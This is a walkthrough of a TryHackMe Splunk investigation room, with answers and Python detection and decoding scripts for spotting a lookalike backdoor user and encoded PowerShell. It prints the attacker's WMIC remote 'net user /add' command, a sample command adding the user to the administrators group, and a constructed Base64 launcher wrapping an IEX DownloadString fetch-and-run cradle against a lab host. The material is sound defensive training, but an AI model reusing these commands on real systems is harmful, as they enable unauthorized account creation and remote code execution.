TryHackMe | Investigating with Splunk Walkthrough
Hi there, I'm glad to see you here. In this article, we'll solve the "Investigating with Splunk" room on TryHackMe together. In some sections I'll share brief background on the subject. Don't forget: you should always do your own research to learn more. I hope it will be helpful for you. Let's start!
Room Machine
Before moving forward, deploy the machine. When you deploy the machine, it will be assigned an IP “Machine IP: MACHINE_IP”. You can visit this IP from the VPN or the Attackbox. The machine will take up to 3–5 minutes to start. All the required logs are ingested in the index main.
Scenario
SOC Analyst Johny has observed some anomalous behaviour in the logs of a few Windows machines. It looks like the adversary has access to some of these machines and has successfully created a backdoor. His manager has asked him to pull those logs from the suspected hosts and ingest them into Splunk for a quick investigation. Our task as SOC Analyst is to examine the logs and identify the anomalies.
To learn more about Splunk and how to investigate the logs, look at the rooms splunk101 and splunk201.
Answer the questions below
Q1: How many events were collected and ingested in the index main?
A1: 12256
If we set the time filter to “All time”, we can see the total number of events.
index=main
Q2: On one of the infected hosts, the adversary was successful in creating a backdoor user. What is the new username?
A2: A1berto
Filtering on Event ID 4720 lists the account-creation events; the name of the new account is in the event details.
index=main EventID="4720"
❗Event ID 4720 : A user account was created
Q3: On the same host, a registry key was also updated regarding the new backdoor user. What is the full path of that registry key?
A3: HKLM\SAM\SAM\Domains\Account\Users\Names\A1berto
The 4720 event also tells us on which host the account was created (the Hostname field). 💻
Combining that hostname with Sysmon Event ID 12 and the new username narrows the results to the registry key that was added for the account.
index=main Hostname="Micheal.Beaven" EventID="12" A1berto
❗️Sysmon Event ID 12 : RegistryEvent (Object create and delete). Creating a local account adds a key for it under HKLM\SAM\SAM\Domains\Account\Users\Names, which is what this event records.
Q4: Examine the logs and identify the user that the adversary was trying to impersonate.
A4: Alberto
Compare the values of the User field in the Fields sidebar: the attacker swapped the letter l in Alberto for the digit 1, giving A1berto. A lookalike name like this is meant to blend in with the legitimate account during a casual review.
index=main
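The check above is done by eye in Splunk. As an added example (not part of the room or the original write-up), here is the same idea as detection logic in Python: it takes constructed Event ID 4720 records (hypothetical hostnames, a key=value layout that only imitates Splunk's extracted fields), compares every newly created account name against a hypothetical list of known accounts, and flags names that collide after folding look-alike characters (1 for l, 0 for o, and so on) or that sit within one edit of an existing name.

```python
import re

# Constructed Event ID 4720 records (not the room's data); hostnames are hypothetical
# and the key=value layout only imitates Splunk's extracted fields.
SAMPLE_4720 = """\
EventID=4720 Hostname=HOST01 TargetUserName=A1berto SubjectUserName=Administrator
EventID=4720 Hostname=HOST01 TargetUserName=backup_svc SubjectUserName=Administrator
EventID=4720 Hostname=HOST03 TargetUserName=Guest SubjectUserName=Administrator
"""

# Hypothetical list of accounts that legitimately exist in the environment.
KNOWN_USERS = ["Alberto", "Administrator", "Guest", "svc_backup"]

# Characters attackers substitute because they look alike in most fonts.
CONFUSABLES = {"1": "l", "0": "o", "3": "e", "5": "s", "7": "t", "8": "b", "2": "z"}


def created_users(text):
    """Collect the account names from the 4720 records."""
    return re.findall(r"TargetUserName=(\S+)", text)


def normalize(name):
    """Lower-case and fold confusable characters so A1berto and Alberto compare equal."""
    return "".join(CONFUSABLES.get(ch, ch) for ch in name.lower())


def levenshtein(a, b):
    """Edit distance; usernames are short, so the simple O(len(a)*len(b)) table is fine."""
    prev = list(range(len(b) + 1))
    for i, ca in enumerate(a, 1):
        cur = [i]
        for j, cb in enumerate(b, 1):
            cur.append(min(prev[j] + 1, cur[j - 1] + 1, prev[j - 1] + (ca != cb)))
        prev = cur
    return prev[-1]


def find_lookalikes(created, known, max_distance=1):
    """Return (new_account, impersonated_account) pairs: a new name that matches a known
    account after confusable folding, or lies within max_distance edits of it.
    A name identical to a known account is skipped; that is a different finding."""
    hits = []
    for new in created:
        for old in known:
            if new.lower() == old.lower():
                continue
            if normalize(new) == normalize(old) or levenshtein(new.lower(), old.lower()) <= max_distance:
                hits.append((new, old))
    return hits


if __name__ == "__main__":
    for new, old in find_lookalikes(created_users(SAMPLE_4720), KNOWN_USERS):
        print(f"{new} looks like {old}")
```

The edit-distance check catches a single added, dropped or swapped character; the confusable folding catches the case here, where the distance is also 1 but the substitution is deliberately invisible to a reader. Widen `max_distance` with care: on a large user base it will start pairing legitimate accounts with each other.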
Q5: What is the command used to add a backdoor user from a remote computer?
A5: C:\windows\System32\Wbem\WMIC.exe" /node:WORKSTATION6 process call create "net user /add A1berto paw0rd1
Event ID 4688 records every new process and, when the audit policy option "Include command line in process creation events" is enabled, its full command line. Filtering on it shows the command the attacker ran from a remote computer: WMIC's /node: switch selects the target host, and process call create spawns the given command there.
Net User is a command-line tool for managing user accounts on Windows; /add creates the account. (A little information break! 📣)
index=main EventID="4688"
❗️Event ID 4688 : A new process has been created
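As an added example (not part of the room or the original write-up), the following Python does what the 4688 search does by hand: it parses constructed Event ID 4688 records (the source hostname HOST01 is hypothetical and the key=value layout only imitates Splunk's extracted fields; the WMIC command line is the one the room shows), flags command lines that use WMIC /node: process call create to run net user /add on another host, and then looks for the net user process that the target host itself logged.

```python
import re

# Constructed Event ID 4688 records (not the room's data). HOST01 is a hypothetical
# source host and the layout only imitates Splunk's extracted fields; the WMIC
# command line in the second record is the one the room's 4688 event shows.
SAMPLE_4688 = r'''
EventID=4688 Hostname=HOST01 CommandLine="C:\Windows\System32\svchost.exe" -k netsvcs
EventID=4688 Hostname=HOST01 CommandLine="C:\windows\System32\Wbem\WMIC.exe" /node:WORKSTATION6 process call create "net user /add A1berto paw0rd1"
EventID=4688 Hostname=WORKSTATION6 CommandLine=net  user /add A1berto paw0rd1
EventID=4688 Hostname=WORKSTATION6 CommandLine=net localgroup administrators A1berto /add
EventID=4688 Hostname=HOST01 CommandLine="C:\Windows\System32\whoami.exe"
'''

LINE_RE = re.compile(r"^EventID=(?P<eid>\d+) Hostname=(?P<host>\S+) CommandLine=(?P<cmd>.*)$")
# WMIC remote execution: /node:<host> picks the target, "process call create" spawns the command there.
WMIC_REMOTE = re.compile(
    r'wmic(?:\.exe)?"?\s+/node:(?P<node>\S+)\s+process\s+call\s+create\s+(?P<cmd>.+)', re.I)


def parse_events(text):
    """Turn the key=value records into dicts with eid, host and cmd."""
    events = []
    for line in text.strip().splitlines():
        m = LINE_RE.match(line)
        if m:
            events.append(m.groupdict())
    return events


def parse_net_user_add(cmd):
    """Return (username, password-or-None) if cmd is a 'net user ... /add', else None.
    Handles both 'net user NAME PASS /add' and the room's 'net user /add NAME PASS' order."""
    m = re.search(r"\bnet1?\s+user\b(?P<args>.*)", cmd, re.I)
    if not m:
        return None
    tokens = [t.strip('"') for t in m.group("args").split()]
    if not any(t.lower() == "/add" for t in tokens):
        return None
    positional = [t for t in tokens if not t.startswith("/")]
    if not positional:
        return None
    return positional[0], (positional[1] if len(positional) > 1 else None)


def find_remote_user_creation(events):
    """Flag 4688 events whose command line uses WMIC to create a user on another host."""
    findings = []
    for ev in events:
        if ev["eid"] != "4688":
            continue
        m = WMIC_REMOTE.search(ev["cmd"])
        if not m:
            continue
        parsed = parse_net_user_add(m.group("cmd"))
        if parsed:
            findings.append({"source": ev["host"], "target": m.group("node").strip('"'),
                             "user": parsed[0], "password": parsed[1]})
    return findings


def corroborate_on_target(findings, events):
    """For each remote creation, find the 'net user /add' process that the target host
    itself logged (the local side of the WMIC call)."""
    out = []
    for f in findings:
        for ev in events:
            if ev["eid"] == "4688" and ev["host"] == f["target"]:
                parsed = parse_net_user_add(ev["cmd"])
                if parsed and parsed[0] == f["user"]:
                    out.append((f["target"], ev["cmd"]))
    return out


if __name__ == "__main__":
    events = parse_events(SAMPLE_4688)
    findings = find_remote_user_creation(events)
    for f in findings:
        print(f"{f['source']} created user {f['user']} on {f['target']} via WMIC")
    for host, cmd in corroborate_on_target(findings, events):
        print(f"  confirmed on {host}: {cmd}")
```

The two-sided view matters in practice: the WMIC command line lives in the source host's 4688 event, while the account creation itself (the local net user process and the 4720 event) lives on the target. Searching only one host shows half the story.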
Q6: How many times was the login attempt from the backdoor user observed during the investigation?
A6: 0
Let's search for every event associated with the account the attacker created.
index=main A1berto
Going through the attacker's actions, there is no logon by this account.
A successful logon would produce Event ID 4624 and a failed attempt Event ID 4625 for that account name, and neither appears among the Event ID values in the results. The backdoor user was created but never used to log in within the collected logs.
Q7: What is the name of the infected host on which suspicious Powershell commands were executed?
A7: James.browne
Searching for PowerShell and checking the Hostname field in the sidebar shows that all of these events come from a single device.
index=main PowerShell
Q8: PowerShell logging is enabled on this device. How many events were logged for the malicious PowerShell execution?
A8: 79
PowerShell module logging writes Event ID 4103 for each pipeline execution, so filtering on it counts the events logged for the malicious execution.
index=main EventID="4103"
❗️Event ID 4103 : PowerShell Module Logging (Microsoft-Windows-PowerShell/Operational), one event per pipeline execution. Event ID 4104 is Script Block Logging, which records the script text itself.
Q9: An encoded Powershell script from the infected host initiated a web request. What is the full URL?
A9: hxxp[://]10[.]10[.]10[.]5/news[.]php
If you’ve discovered an interesting PowerShell command, you’re in the right place; keep it up! 👊🏻
index=main PowerShell
❗️CyberChef — The Cyber Swiss Army Knife : A simple, intuitive web app for analysing and decoding data without having to deal with complex tools or programming languages.
To decode the Base64 string we found, use CyberChef's "From Base64" followed by "Decode text". When a script is passed with -EncodedCommand, as is usual for this kind of launcher, the Base64 wraps the UTF-16LE bytes of the script, so choose UTF-16LE (codepage 1200) in "Decode text"; otherwise the output shows a null byte between every character.
❗️Base64 is a group of similar binary-to-text encoding schemes that represent binary data in an ASCII string format by translating it into a radix-64 representation. Long story short, Base64 is used to encode binary data as printable text.
The output contains another Base64 string and a reference to a .php file. Base64 is an encoding, not a hash, so each layer can simply be reversed.
Apply the same two operations to the new Base64 string.
And finally, let’s put everything together.
❗URL defanging is the standard term for making URLs non-clickable so they cannot be opened by accident from a report: http becomes hxxp and each dot becomes [.], as in the answer above.
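The CyberChef steps above (From Base64, Decode text, repeat, then defang) as a script, added here as an example and not taken from the room or the original write-up. The launcher it decodes is constructed inside the block: `build_sample()` wraps a download cradle for the room's URL in two Base64 layers (inner UTF-8, outer UTF-16LE as -EncodedCommand expects), and `peel()` unwraps them the same way an analyst would, choosing the text encoding from the bytes rather than guessing.

```python
import base64
import binascii
import re

# The URL the constructed sample embeds: it is the room's answer, re-encoded here so the
# decoding path runs on realistic input; the launcher itself is not the room's event.
SAMPLE_URL = "http://10.10.10.5/news.php"


def build_sample():
    """Build a two-stage launcher the way an attacker would: the download cradle is
    Base64 (UTF-8) inside a script that is itself Base64 (UTF-16LE) for -EncodedCommand."""
    stage2 = f"IEX (New-Object Net.WebClient).DownloadString('{SAMPLE_URL}')"
    inner = base64.b64encode(stage2.encode("utf-8")).decode("ascii")
    stage1 = ("$s=[System.Text.Encoding]::UTF8.GetString("
              f"[System.Convert]::FromBase64String('{inner}'));IEX $s")
    outer = base64.b64encode(stage1.encode("utf-16-le")).decode("ascii")
    return f"powershell.exe -nop -w hidden -enc {outer}"


B64_RE = re.compile(r"[A-Za-z0-9+/]{20,}={0,2}")
URL_RE = re.compile(r"https?://[^\s'\"<>)]+")


def decode_b64_text(blob):
    """Base64-decode and pick the text encoding: -EncodedCommand payloads are UTF-16LE,
    so for an ASCII script every odd byte is 0x00; otherwise treat the bytes as UTF-8."""
    raw = base64.b64decode(blob, validate=True)
    if len(raw) % 2 == 0 and not any(raw[1::2]):
        return raw.decode("utf-16-le")
    return raw.decode("utf-8")


def peel(command, max_depth=5):
    """Decode the longest Base64 blob in the text, then repeat on the result until no
    layer decodes. Returns the decoded layers, outermost first."""
    layers, current = [], command
    for _ in range(max_depth):
        decoded = None
        for blob in sorted(B64_RE.findall(current), key=len, reverse=True):
            try:
                decoded = decode_b64_text(blob)
                break
            except (binascii.Error, ValueError, UnicodeDecodeError):
                continue  # not real Base64 text (e.g. a long hex hash); try the next blob
        if decoded is None:
            break
        layers.append(decoded)
        current = decoded
    return layers


def extract_urls(layers):
    """Unique URLs found in any decoded layer, in order of appearance."""
    urls = []
    for layer in layers:
        for url in URL_RE.findall(layer):
            if url not in urls:
                urls.append(url)
    return urls


def defang(url):
    """hxxp[://]host[.]tld form, so the indicator cannot be clicked in a report."""
    return url.replace("http", "hxxp", 1).replace("://", "[://]").replace(".", "[.]")


if __name__ == "__main__":
    layers = peel(build_sample())
    for i, layer in enumerate(layers, 1):
        print(f"layer {i}: {layer[:70]}...")
    print([defang(u) for u in extract_urls(layers)])
```

The UTF-16LE test is the detail that trips people up in CyberChef: decoding the outer layer as UTF-8 still "works" but yields interleaved nulls, and the inner Base64 then fails to match because of them. Recursion stops by itself once a layer contains no further Base64, and `max_depth` guards against pathological input.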
I think we've reached the end of another adventure. See you in the next attack analysis!
Thank you for your time. Until then, Happy Hacking ❤
Resource:
https://www.ultimatewindowssecurity.com/securitylog/encyclopedia